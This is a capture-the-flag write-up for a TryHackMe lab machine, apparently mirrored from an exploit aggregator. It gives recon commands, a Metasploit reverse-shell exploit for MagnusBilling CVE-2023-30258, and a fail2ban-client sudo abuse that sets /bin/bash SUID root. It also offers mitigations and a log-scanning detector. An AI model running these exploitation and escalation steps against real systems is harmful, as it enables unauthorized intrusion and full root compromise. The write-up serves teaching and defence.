## https://sploitus.com/exploit?id=F28826C1-F5C5-5AE0-BE50-6336FBF9943C
# THM-MagnusBilling-CVE-2023-30258

⸻

🛡️ MagnusBilling RCE → Root (CVE-2023-30258)

📌 Overview
	•	Target: 10.145.148.203
	•	Platform: TryHackMe
	•	Vulnerability: CVE-2023-30258
	•	Initial Access: Unauthenticated Remote Code Execution (RCE) via command injection, landing as the asterisk user
	•	Privilege Escalation: sudo rule allowing fail2ban-client to run as root without a password
	•	Final Access: Root

⸻

🔍 1. Reconnaissance

Port Scan

rustscan -a 10.145.148.203

📊 Open Ports

| Port | Service |
|------|---------|
| 22 | SSH |
| 80 | HTTP |
| 3306 | MySQL |
| 5038 | Asterisk Manager Interface (AMI) |

Port 5038 is the Asterisk Manager Interface. Together with MySQL on 3306 and a web server on 80, this points to a VoIP billing stack, which is exactly what MagnusBilling is.

⸻

🌐 2. Web Enumeration

Directory Fuzzing

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt \
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c

📁 Findings:
	•	/archive
	•	/assets
	•	/lib
	•	/tmp
	•	/protected


Fuzzing under /mbilling confirms a MagnusBilling install (the application's web root). The exposed /lib and /protected directories hold the application's own code and its bundled third-party libraries, so they are the first place to look for known vulnerabilities.


⸻

🚨 3. Vulnerability Identification

CVE-2023-30258

MagnusBilling 6.x and 7.x (before the vendor fix) are affected by CVE-2023-30258, an unauthenticated command injection: a piece of demonstration code in lib/icepay/icepay.php passes the democ GET parameter to exec() without sanitisation, so any value containing a shell separator is executed as the web-server user. In practice this means:
	•	Unauthenticated Remote Code Execution (RCE) from a single GET request
	•	Command injection running as the asterisk account
	•	Full system compromise once combined with a local privilege escalation

⸻

💣 4. Exploitation (Metasploit)

msfconsole

search CVE:2023-30258

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

set RHOSTS 10.145.148.203
set LHOST tun0
set LPORT 4444
run




⸻

🎯 Result

meterpreter session opened

sysinfo

OS: Linux Debian
User: asterisk

The session runs as asterisk because MagnusBilling's web stack runs under that account, so the injected command inherits its privileges rather than root's.



⸻

🔐 5. Initial Access

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

whoami

asterisk

⸻

🏁 6. User Flag

cd /home/magnus
cat user.txt

⸻

🔎 7. Privilege Escalation

Check sudo

sudo -l

(ALL) NOPASSWD: /usr/bin/fail2ban-client

Critical misconfiguration: fail2ban-client is only a front end to the fail2ban server, which runs as root, and the client can define actions (arbitrary shell commands) and trigger them. Anyone allowed to run the client as root can therefore run commands as root.




⸻

💣 8. Exploiting Fail2Ban

Add a malicious action

The jail name (mbilling_login) comes from the client's status listing of active jails. Each step below is executed by the root-owned fail2ban server:

sudo fail2ban-client set mbilling_login addaction evil

Creates an empty action named evil in the jail.

sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"

Sets the command the server runs, as root, every time the jail bans an IP.

sudo fail2ban-client set mbilling_login banip 127.0.0.1

Forces a ban, which fires actionban and makes /bin/bash SUID root.





⸻

🚀 9. Root Access

/bin/bash -p

id

euid=0(root)

whoami still reports asterisk because the real uid is unchanged; id shows euid=0(root). The -p flag tells bash not to drop the effective uid when it differs from the real uid, which is what makes the SUID bit usable.



⸻

👑 10. Root Flag

cat /root/root.txt

⸻

🧠 11. Key Takeaways
	•	A public CVE with a Metasploit module provided easy initial access
	•	Web enumeration matters: fuzzing under /mbilling confirmed the application and its exposed code directories
	•	A single NOPASSWD sudo rule on the wrong binary is enough for full system compromise
	•	fail2ban-client is a root-command primitive when run via sudo, because its actions are shell commands executed by the root-owned server

⸻

🛡️ 12. Mitigation
	•	Update MagnusBilling to a release that contains the vendor fix for CVE-2023-30258 in lib/icepay/icepay.php
	•	Remove the NOPASSWD sudo rule for fail2ban-client; if a service account must query fail2ban, allow only the read-only status subcommand with exact argument matching, bearing in mind that sudoers wildcards also match spaces and let extra arguments through
	•	Run the web stack under a dedicated low-privilege account rather than asterisk, so a web RCE does not land in the VoIP account
	•	Monitor sudo logs for fail2ban-client calls that add or modify actions or force bans
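To catch the escalation from section 8 after the fact, the sudo lines in auth.log are enough. The detector below is an added example for this write-up, not code from the original post; the log lines are constructed for the example in the syslog format sudo writes, and none of them come from the target machine.

```python
#!/usr/bin/env python3
"""Flag sudo invocations of fail2ban-client that define or trigger actions.

Added example. Looks for the three-step pattern from section 8: an action is
added, its actionban command is replaced, and a ban is forced to fire. The
SAMPLE_AUTH_LOG lines are constructed in sudo's auth.log format.
"""
import re

# sudo auth.log line: "sudo: <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
# "set <jail> addaction <name>", "set <jail> action <name> <prop> <value>", "set <jail> banip <ip>"
F2B_SET_RE = re.compile(
    r"^\S*fail2ban-client\s+set\s+(?P<jail>\S+)\s+(?P<verb>addaction|action|banip)\b"
)

SEVERITY = {
    "addaction": "high",   # a new action (a command hook) was created
    "action": "high",      # an action's command line was changed
    "banip": "medium",     # a ban was forced, i.e. actionban was triggered
}

# Constructed sample: the section 8 sequence plus two benign entries.
SAMPLE_AUTH_LOG = """\
Mar  3 10:12:01 mbilling sudo:  asterisk : TTY=pts/0 ; PWD=/home/asterisk ; USER=root ; COMMAND=/usr/bin/fail2ban-client status
Mar  3 10:12:20 mbilling sudo:  asterisk : TTY=pts/0 ; PWD=/home/asterisk ; USER=root ; COMMAND=/usr/bin/fail2ban-client set mbilling_login addaction evil
Mar  3 10:12:31 mbilling sudo:  asterisk : TTY=pts/0 ; PWD=/home/asterisk ; USER=root ; COMMAND=/usr/bin/fail2ban-client set mbilling_login action evil actionban chmod +s /bin/bash
Mar  3 10:12:40 mbilling sudo:  asterisk : TTY=pts/0 ; PWD=/home/asterisk ; USER=root ; COMMAND=/usr/bin/fail2ban-client set mbilling_login banip 127.0.0.1
Mar  3 10:13:02 mbilling sudo:    magnus : TTY=pts/1 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/apt update
"""


def parse_sudo(line):
    """Return (user, runas, command) for a sudo auth.log line, else None."""
    m = SUDO_RE.search(line)
    return (m["user"], m["runas"], m["cmd"]) if m else None


def classify_fail2ban(command):
    """Return (jail, verb, severity) when the command edits or fires a
    fail2ban action; None for anything else (including plain 'status')."""
    m = F2B_SET_RE.match(command)
    if not m:
        return None
    return m["jail"], m["verb"], SEVERITY[m["verb"]]


def find_abuse(lines):
    """Scan log lines and return one alert dict per suspicious call."""
    alerts = []
    for line in lines:
        parsed = parse_sudo(line)
        if not parsed:
            continue
        user, runas, cmd = parsed
        hit = classify_fail2ban(cmd)
        if hit:
            jail, verb, severity = hit
            alerts.append({"user": user, "runas": runas, "jail": jail,
                           "verb": verb, "severity": severity, "command": cmd})
    return alerts


if __name__ == "__main__":
    for a in find_abuse(SAMPLE_AUTH_LOG.splitlines()):
        print(f"[{a['severity']}] {a['user']} -> {a['runas']} ({a['jail']}/{a['verb']}): {a['command']}")
```

On the sample this yields two high alerts (addaction, action) and one medium (banip) for asterisk, and nothing for the status query or the apt run. In production, feed it `grep sudo /var/log/auth.log` or the journald equivalent, and treat addaction or action from any non-administrative account as an immediate escalation indicator.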

⸻

💀 Conclusion

This machine demonstrates a realistic attack chain:

Web RCE → Shell → Privilege Escalation → Root

A combination of vulnerability + misconfiguration led to full system compromise.

